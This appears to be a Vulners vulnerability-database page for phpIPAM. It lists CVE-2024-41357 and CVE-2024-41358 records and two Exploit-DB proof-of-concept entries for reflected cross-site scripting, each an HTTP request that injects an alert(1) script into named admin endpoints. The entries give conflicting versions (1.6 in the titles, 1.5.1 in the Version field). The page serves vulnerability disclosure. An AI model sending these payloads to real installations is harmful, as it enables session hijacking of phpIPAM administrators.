| Reporter | Title | Published | Views | Family All 23 |
|---|---|---|---|---|
| CVE-2024-41358 | 29 Aug 202420:15 | – | attackerkb | |
| CVE-2024-41357 | 26 Jul 202418:52 | – | circl | |
| CVE-2024-41358 | 29 Aug 202422:55 | – | circl | |
| phpIPAM 安全漏洞 | 26 Jul 202400:00 | – | cnnvd | |
| phpIPAM 安全漏洞 | 29 Aug 202400:00 | – | cnnvd | |
| CVE-2024-41357 | 26 Jul 202400:00 | – | cve | |
| CVE-2024-41358 | 29 Aug 202400:00 | – | cve | |
| CVE-2024-41357 | 26 Jul 202400:00 | – | cvelist | |
| CVE-2024-41358 | 29 Aug 202400:00 | – | cvelist | |
| phpIPAM 1.6 - Reflected Cross-Site Scripting (XSS) | 2 Dec 202500:00 | – | exploitdb |
# Exploit Title: phpIPAM 1.6 - Reflected Cross-Site Scripting (XSS)
# Date: 2025-11-25
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/phpipam/phpipam/
# Software Link: https://github.com/phpipam/phpipam/
# Version: 1.5.1
# Tested on: Windows
# CVE : CVE-2024-41358
Proof Of Concept
GET http://phpipam/app/admin/import-export/import-devices-preview.php?&filetype=anyValidFiletype&expfields=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E&importFields__%22%3E%3Cscript%3Ealert%281%29%3C/script%3E=anyValue
# Exploit Title: phpIPAM 1.6 - Reflected Cross-Site Scripting (XSS)
# Date: 2025-11-25
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/phpipam/phpipam/
# Software Link: https://github.com/phpipam/phpipam/
# Version: 1.5.1
# Tested on: Windows
# CVE : CVE-2024-41357
Proof Of Concept
# PoC to trigger XSS vulnerability in phpipam 1.6
# Ensure you are logged in as an admin user to satisfy the admin check condition.
# Send the following POST request to trigger the XSS vulnerability:
POST /app/admin/powerDNS/record-edit.php HTTP/1.1
Host: phpipam
Content-Type: application/x-www-form-urlencoded
Content-Length: <calculated_length>
action=add&domain_id=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
# This will execute the alert(1) script when the response is rendered in the browser.Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation